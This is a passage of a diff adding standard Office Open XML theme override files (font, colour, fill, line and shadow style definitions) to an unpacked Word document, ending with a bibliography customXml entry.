+      <a:ea typeface=""/>
+      <a:cs typeface=""/>
+      <a:font script="Jpan" typeface="游ゴシック"/>
+      <a:font script="Hang" typeface="맑은 고딕"/>
+      <a:font script="Hans" typeface="等线"/>
+      <a:font script="Hant" typeface="新細明體"/>
+      <a:font script="Arab" typeface="Arial"/>
+      <a:font script="Hebr" typeface="Arial"/>
+      <a:font script="Thai" typeface="Tahoma"/>
+      <a:font script="Ethi" typeface="Nyala"/>
+      <a:font script="Beng" typeface="Vrinda"/>
+      <a:font script="Gujr" typeface="Shruti"/>
+      <a:font script="Khmr" typeface="DaunPenh"/>
+      <a:font script="Knda" typeface="Tunga"/>
+      <a:font script="Guru" typeface="Raavi"/>
+      <a:font script="Cans" typeface="Euphemia"/>
+      <a:font script="Cher" typeface="Plantagenet Cherokee"/>
+      <a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
+      <a:font script="Tibt" typeface="Microsoft Himalaya"/>
+      <a:font script="Thaa" typeface="MV Boli"/>
+      <a:font script="Deva" typeface="Mangal"/>
+      <a:font script="Telu" typeface="Gautami"/>
+      <a:font script="Taml" typeface="Latha"/>
+      <a:font script="Syrc" typeface="Estrangelo Edessa"/>
+      <a:font script="Orya" typeface="Kalinga"/>
+      <a:font script="Mlym" typeface="Kartika"/>
+      <a:font script="Laoo" typeface="DokChampa"/>
+      <a:font script="Sinh" typeface="Iskoola Pota"/>
+      <a:font script="Mong" typeface="Mongolian Baiti"/>
+      <a:font script="Viet" typeface="Arial"/>
+      <a:font script="Uigh" typeface="Microsoft Uighur"/>
+      <a:font script="Geor" typeface="Sylfaen"/>
+      <a:font script="Armn" typeface="Arial"/>
+      <a:font script="Bugi" typeface="Leelawadee UI"/>
+      <a:font script="Bopo" typeface="Microsoft JhengHei"/>
+      <a:font script="Java" typeface="Javanese Text"/>
+      <a:font script="Lisu" typeface="Segoe UI"/>
+      <a:font script="Mymr" typeface="Myanmar Text"/>
+      <a:font script="Nkoo" typeface="Ebrima"/>
+      <a:font script="Olck" typeface="Nirmala UI"/>
+      <a:font script="Osma" typeface="Ebrima"/>
+      <a:font script="Phag" typeface="Phagspa"/>
+      <a:font script="Syrn" typeface="Estrangelo Edessa"/>
+      <a:font script="Syrj" typeface="Estrangelo Edessa"/>
+      <a:font script="Syre" typeface="Estrangelo Edessa"/>
+      <a:font script="Sora" typeface="Nirmala UI"/>
+      <a:font script="Tale" typeface="Microsoft Tai Le"/>
+      <a:font script="Talu" typeface="Microsoft New Tai Lue"/>
+      <a:font script="Tfng" typeface="Ebrima"/>
+    </a:minorFont>
+  </a:fontScheme>
+  <a:fmtScheme name="Office">
+    <a:fillStyleLst>
+      <a:solidFill>
+        <a:schemeClr val="phClr"/>
+      </a:solidFill>
+      <a:gradFill rotWithShape="1">
+        <a:gsLst>
+          <a:gs pos="0">
+            <a:schemeClr val="phClr">
+              <a:lumMod val="110000"/>
+              <a:satMod val="105000"/>
+              <a:tint val="67000"/>
+            </a:schemeClr>
+          </a:gs>
+          <a:gs pos="50000">
+            <a:schemeClr val="phClr">
+              <a:lumMod val="105000"/>
+              <a:satMod val="103000"/>
+              <a:tint val="73000"/>
+            </a:schemeClr>
+          </a:gs>
+          <a:gs pos="100000">
+            <a:schemeClr val="phClr">
+              <a:lumMod val="105000"/>
+              <a:satMod val="109000"/>
+              <a:tint val="81000"/>
+            </a:schemeClr>
+          </a:gs>
+        </a:gsLst>
+        <a:lin ang="5400000" scaled="0"/>
+      </a:gradFill>
+      <a:gradFill rotWithShape="1">
+        <a:gsLst>
+          <a:gs pos="0">
+            <a:schemeClr val="phClr">
+              <a:satMod val="103000"/>
+              <a:lumMod val="102000"/>
+              <a:tint val="94000"/>
+            </a:schemeClr>
+          </a:gs>
+          <a:gs pos="50000">
+            <a:schemeClr val="phClr">
+              <a:satMod val="110000"/>
+              <a:lumMod val="100000"/>
+              <a:shade val="100000"/>
+            </a:schemeClr>
+          </a:gs>
+          <a:gs pos="100000">
+            <a:schemeClr val="phClr">
+              <a:lumMod val="99000"/>
+              <a:satMod val="120000"/>
+              <a:shade val="78000"/>
+            </a:schemeClr>
+          </a:gs>
+        </a:gsLst>
+        <a:lin ang="5400000" scaled="0"/>
+      </a:gradFill>
+    </a:fillStyleLst>
+    <a:lnStyleLst>
+      <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+        <a:prstDash val="solid"/>
+        <a:miter lim="800000"/>
+      </a:ln>
+      <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+        <a:prstDash val="solid"/>
+        <a:miter lim="800000"/>
+      </a:ln>
+      <a:ln w="19050" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+        <a:prstDash val="solid"/>
+        <a:miter lim="800000"/>
+      </a:ln>
+    </a:lnStyleLst>
+    <a:effectStyleLst>
+      <a:effectStyle>
+        <a:effectLst/>
+      </a:effectStyle>
+      <a:effectStyle>
+        <a:effectLst/>
+      </a:effectStyle>
+      <a:effectStyle>
+        <a:effectLst>
+          <a:outerShdw blurRad="57150" dist="19050" dir="5400000" algn="ctr" rotWithShape="0">
+            <a:srgbClr val="000000">
+              <a:alpha val="63000"/>
+            </a:srgbClr>
+          </a:outerShdw>
+        </a:effectLst>
+      </a:effectStyle>
+    </a:effectStyleLst>
+    <a:bgFillStyleLst>
+      <a:solidFill>
+        <a:schemeClr val="phClr"/>
+      </a:solidFill>
+      <a:solidFill>
+        <a:schemeClr val="phClr">
+          <a:tint val="95000"/>
+          <a:satMod val="170000"/>
+        </a:schemeClr>
+      </a:solidFill>
+      <a:gradFill rotWithShape="1">
+        <a:gsLst>
+          <a:gs pos="0">
+            <a:schemeClr val="phClr">
+              <a:tint val="93000"/>
+              <a:satMod val="150000"/>
+              <a:shade val="98000"/>
+              <a:lumMod val="102000"/>
+            </a:schemeClr>
+          </a:gs>
+          <a:gs pos="50000">
+            <a:schemeClr val="phClr">
+              <a:tint val="98000"/>
+              <a:satMod val="130000"/>
+              <a:shade val="90000"/>
+              <a:lumMod val="103000"/>
+            </a:schemeClr>
+          </a:gs>
+          <a:gs pos="100000">
+            <a:schemeClr val="phClr">
+              <a:shade val="63000"/>
+              <a:satMod val="120000"/>
+            </a:schemeClr>
+          </a:gs>
+        </a:gsLst>
+        <a:lin ang="5400000" scaled="0"/>
+      </a:gradFill>
+    </a:bgFillStyleLst>
+  </a:fmtScheme>
+</a:themeOverride>
+</file>
+
+<file path=word/theme/themeOverride2.xml><?xml version="1.0" encoding="utf-8"?>
+<a:themeOverride xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+  <a:clrScheme name="Office">
+    <a:dk1>
+      <a:sysClr val="windowText" lastClr="000000"/>
+    </a:dk1>
+    <a:lt1>
+      <a:sysClr val="window" lastClr="FFFFFF"/>
+    </a:lt1>
+    <a:dk2>
+      <a:srgbClr val="44546A"/>
+    </a:dk2>
+    <a:lt2>
+      <a:srgbClr val="E7E6E6"/>
+    </a:lt2>
+    <a:accent1>
+      <a:srgbClr val="4472C4"/>
+    </a:accent1>
+    <a:accent2>
+      <a:srgbClr val="ED7D31"/>
+    </a:accent2>
+    <a:accent3>
+      <a:srgbClr val="A5A5A5"/>
+    </a:accent3>
+    <a:accent4>
+      <a:srgbClr val="FFC000"/>
+    </a:accent4>
+    <a:accent5>
+      <a:srgbClr val="5B9BD5"/>
+    </a:accent5>
+    <a:accent6>
+      <a:srgbClr val="70AD47"/>
+    </a:accent6>
+    <a:hlink>
+      <a:srgbClr val="0563C1"/>
+    </a:hlink>
+    <a:folHlink>
+      <a:srgbClr val="954F72"/>
+    </a:folHlink>
+  </a:clrScheme>
+  <a:fontScheme name="Office">
+    <a:majorFont>
+      <a:latin typeface="Calibri Light" panose="020F0302020204030204"/>
+      <a:ea typeface=""/>
+      <a:cs typeface=""/>
+      <a:font script="Jpan" typeface="游ゴシック Light"/>
+      <a:font script="Hang" typeface="맑은 고딕"/>
+      <a:font script="Hans" typeface="等线 Light"/>
+      <a:font script="Hant" typeface="新細明體"/>
+      <a:font script="Arab" typeface="Times New Roman"/>
+      <a:font script="Hebr" typeface="Times New Roman"/>
+      <a:font script="Thai" typeface="Tahoma"/>
+      <a:font script="Ethi" typeface="Nyala"/>
+      <a:font script="Beng" typeface="Vrinda"/>
+      <a:font script="Gujr" typeface="Shruti"/>
+      <a:font script="Khmr" typeface="MoolBoran"/>
+      <a:font script="Knda" typeface="Tunga"/>
+      <a:font script="Guru" typeface="Raavi"/>
+      <a:font script="Cans" typeface="Euphemia"/>
+      <a:font script="Cher" typeface="Plantagenet Cherokee"/>
+      <a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
+      <a:font script="Tibt" typeface="Microsoft Himalaya"/>
+      <a:font script="Thaa" typeface="MV Boli"/>
+      <a:font script="Deva" typeface="Mangal"/>
+      <a:font script="Telu" typeface="Gautami"/>
+      <a:font script="Taml" typeface="Latha"/>
+      <a:font script="Syrc" typeface="Estrangelo Edessa"/>
+      <a:font script="Orya" typeface="Kalinga"/>
+      <a:font script="Mlym" typeface="Kartika"/>
+      <a:font script="Laoo" typeface="DokChampa"/>
+      <a:font script="Sinh" typeface="Iskoola Pota"/>
+      <a:font script="Mong" typeface="Mongolian Baiti"/>
+      <a:font script="Viet" typeface="Times New Roman"/>
+      <a:font script="Uigh" typeface="Microsoft Uighur"/>
+      <a:font script="Geor" typeface="Sylfaen"/>
+      <a:font script="Armn" typeface="Arial"/>
+      <a:font script="Bugi" typeface="Leelawadee UI"/>
+      <a:font script="Bopo" typeface="Microsoft JhengHei"/>
+      <a:font script="Java" typeface="Javanese Text"/>
+      <a:font script="Lisu" typeface="Segoe UI"/>
+      <a:font script="Mymr" typeface="Myanmar Text"/>
+      <a:font script="Nkoo" typeface="Ebrima"/>
+      <a:font script="Olck" typeface="Nirmala UI"/>
+      <a:font script="Osma" typeface="Ebrima"/>
+      <a:font script="Phag" typeface="Phagspa"/>
+      <a:font script="Syrn" typeface="Estrangelo Edessa"/>
+      <a:font script="Syrj" typeface="Estrangelo Edessa"/>
+      <a:font script="Syre" typeface="Estrangelo Edessa"/>
+      <a:font script="Sora" typeface="Nirmala UI"/>
+      <a:font script="Tale" typeface="Microsoft Tai Le"/>
+      <a:font script="Talu" typeface="Microsoft New Tai Lue"/>
+      <a:font script="Tfng" typeface="Ebrima"/>
+    </a:majorFont>
+    <a:minorFont>
+      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
+      <a:ea typeface=""/>
+      <a:cs typeface=""/>
+      <a:font script="Jpan" typeface="游ゴシック"/>
+      <a:font script="Hang" typeface="맑은 고딕"/>
+      <a:font script="Hans" typeface="等线"/>
+      <a:font script="Hant" typeface="新細明體"/>
+      <a:font script="Arab" typeface="Arial"/>
+      <a:font script="Hebr" typeface="Arial"/>
+      <a:font script="Thai" typeface="Tahoma"/>
+      <a:font script="Ethi" typeface="Nyala"/>
+      <a:font script="Beng" typeface="Vrinda"/>
+      <a:font script="Gujr" typeface="Shruti"/>
+      <a:font script="Khmr" typeface="DaunPenh"/>
+      <a:font script="Knda" typeface="Tunga"/>
+      <a:font script="Guru" typeface="Raavi"/>
+      <a:font script="Cans" typeface="Euphemia"/>
+      <a:font script="Cher" typeface="Plantagenet Cherokee"/>
+      <a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
+      <a:font script="Tibt" typeface="Microsoft Himalaya"/>
+      <a:font script="Thaa" typeface="MV Boli"/>
+      <a:font script="Deva" typeface="Mangal"/>
+      <a:font script="Telu" typeface="Gautami"/>
+      <a:font script="Taml" typeface="Latha"/>
+      <a:font script="Syrc" typeface="Estrangelo Edessa"/>
+      <a:font script="Orya" typeface="Kalinga"/>
+      <a:font script="Mlym" typeface="Kartika"/>
+      <a:font script="Laoo" typeface="DokChampa"/>
+      <a:font script="Sinh" typeface="Iskoola Pota"/>
+      <a:font script="Mong" typeface="Mongolian Baiti"/>
+      <a:font script="Viet" typeface="Arial"/>
+      <a:font script="Uigh" typeface="Microsoft Uighur"/>
+      <a:font script="Geor" typeface="Sylfaen"/>
+      <a:font script="Armn" typeface="Arial"/>
+      <a:font script="Bugi" typeface="Leelawadee UI"/>
+      <a:font script="Bopo" typeface="Microsoft JhengHei"/>
+      <a:font script="Java" typeface="Javanese Text"/>
+      <a:font script="Lisu" typeface="Segoe UI"/>
+      <a:font script="Mymr" typeface="Myanmar Text"/>
+      <a:font script="Nkoo" typeface="Ebrima"/>
+      <a:font script="Olck" typeface="Nirmala UI"/>
+      <a:font script="Osma" typeface="Ebrima"/>
+      <a:font script="Phag" typeface="Phagspa"/>
+      <a:font script="Syrn" typeface="Estrangelo Edessa"/>
+      <a:font script="Syrj" typeface="Estrangelo Edessa"/>
+      <a:font script="Syre" typeface="Estrangelo Edessa"/>
+      <a:font script="Sora" typeface="Nirmala UI"/>
+      <a:font script="Tale" typeface="Microsoft Tai Le"/>
+      <a:font script="Talu" typeface="Microsoft New Tai Lue"/>
+      <a:font script="Tfng" typeface="Ebrima"/>
+    </a:minorFont>
+  </a:fontScheme>
+  <a:fmtScheme name="Office">
+    <a:fillStyleLst>
+      <a:solidFill>
+        <a:schemeClr val="phClr"/>
+      </a:solidFill>
+      <a:gradFill rotWithShape="1">
+        <a:gsLst>
+          <a:gs pos="0">
+            <a:schemeClr val="phClr">
+              <a:lumMod val="110000"/>
+              <a:satMod val="105000"/>
+              <a:tint val="67000"/>
+            </a:schemeClr>
+          </a:gs>
+          <a:gs pos="50000">
+            <a:schemeClr val="phClr">
+              <a:lumMod val="105000"/>
+              <a:satMod val="103000"/>
+              <a:tint val="73000"/>
+            </a:schemeClr>
+          </a:gs>
+          <a:gs pos="100000">
+            <a:schemeClr val="phClr">
+              <a:lumMod val="105000"/>
+              <a:satMod val="109000"/>
+              <a:tint val="81000"/>
+            </a:schemeClr>
+          </a:gs>
+        </a:gsLst>
+        <a:lin ang="5400000" scaled="0"/>
+      </a:gradFill>
+      <a:gradFill rotWithShape="1">
+        <a:gsLst>
+          <a:gs pos="0">
+            <a:schemeClr val="phClr">
+              <a:satMod val="103000"/>
+              <a:lumMod val="102000"/>
+              <a:tint val="94000"/>
+            </a:schemeClr>
+          </a:gs>
+          <a:gs pos="50000">
+            <a:schemeClr val="phClr">
+              <a:satMod val="110000"/>
+              <a:lumMod val="100000"/>
+              <a:shade val="100000"/>
+            </a:schemeClr>
+          </a:gs>
+          <a:gs pos="100000">
+            <a:schemeClr val="phClr">
+              <a:lumMod val="99000"/>
+              <a:satMod val="120000"/>
+              <a:shade val="78000"/>
+            </a:schemeClr>
+          </a:gs>
+        </a:gsLst>
+        <a:lin ang="5400000" scaled="0"/>
+      </a:gradFill>
+    </a:fillStyleLst>
+    <a:lnStyleLst>
+      <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+        <a:prstDash val="solid"/>
+        <a:miter lim="800000"/>
+      </a:ln>
+      <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+        <a:prstDash val="solid"/>
+        <a:miter lim="800000"/>
+      </a:ln>
+      <a:ln w="19050" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+        <a:prstDash val="solid"/>
+        <a:miter lim="800000"/>
+      </a:ln>
+    </a:lnStyleLst>
+    <a:effectStyleLst>
+      <a:effectStyle>
+        <a:effectLst/>
+      </a:effectStyle>
+      <a:effectStyle>
+        <a:effectLst/>
+      </a:effectStyle>
+      <a:effectStyle>
+        <a:effectLst>
+          <a:outerShdw blurRad="57150" dist="19050" dir="5400000" algn="ctr" rotWithShape="0">
+            <a:srgbClr val="000000">
+              <a:alpha val="63000"/>
+            </a:srgbClr>
+          </a:outerShdw>
+        </a:effectLst>
+      </a:effectStyle>
+    </a:effectStyleLst>
+    <a:bgFillStyleLst>
+      <a:solidFill>
+        <a:schemeClr val="phClr"/>
+      </a:solidFill>
+      <a:solidFill>
+        <a:schemeClr val="phClr">
+          <a:tint val="95000"/>
+          <a:satMod val="170000"/>
+        </a:schemeClr>
+      </a:solidFill>
+      <a:gradFill rotWithShape="1">
+        <a:gsLst>
+          <a:gs pos="0">
+            <a:schemeClr val="phClr">
+              <a:tint val="93000"/>
+              <a:satMod val="150000"/>
+              <a:shade val="98000"/>
+              <a:lumMod val="102000"/>
+            </a:schemeClr>
+          </a:gs>
+          <a:gs pos="50000">
+            <a:schemeClr val="phClr">
+              <a:tint val="98000"/>
+              <a:satMod val="130000"/>
+              <a:shade val="90000"/>
+              <a:lumMod val="103000"/>
+            </a:schemeClr>
+          </a:gs>
+          <a:gs pos="100000">
+            <a:schemeClr val="phClr">
+              <a:shade val="63000"/>
+              <a:satMod val="120000"/>
+            </a:schemeClr>
+          </a:gs>
+        </a:gsLst>
+        <a:lin ang="5400000" scaled="0"/>
+      </a:gradFill>
+    </a:bgFillStyleLst>
+  </a:fmtScheme>
+</a:themeOverride>
+</file>
+
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
 <b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APASixthEditionOfficeOnline.xsl" StyleName="APA" Version="6"/>
 </file>

</xml_diff>